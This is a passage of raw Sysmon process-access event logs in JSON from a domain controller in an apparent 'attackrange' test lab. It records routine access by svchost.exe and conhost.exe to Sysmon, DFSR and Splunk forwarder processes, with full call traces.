C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1834,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1835,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1836,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.406\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-001041B70300}\r\nTargetProcessId: 3748\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.406","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-001041B70300}","TargetProcessId":"3748","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1837,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.406\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2204\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+264a1|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2669f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25c4b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27476|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27db2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+277c9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26100|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.406","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2204","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+264a1|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2669f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25c4b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27476|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27db2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+277c9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26100|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1838,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.406\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2204\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+264a1|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2669f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25c4b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27476|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27db2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+277c9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26100|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.406","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2204","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+264a1|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2669f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25c4b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27476|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27db2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+277c9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26100|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1839,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.406\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2204\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.406","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2204","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1840,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.406\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2204\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.406","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2204","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
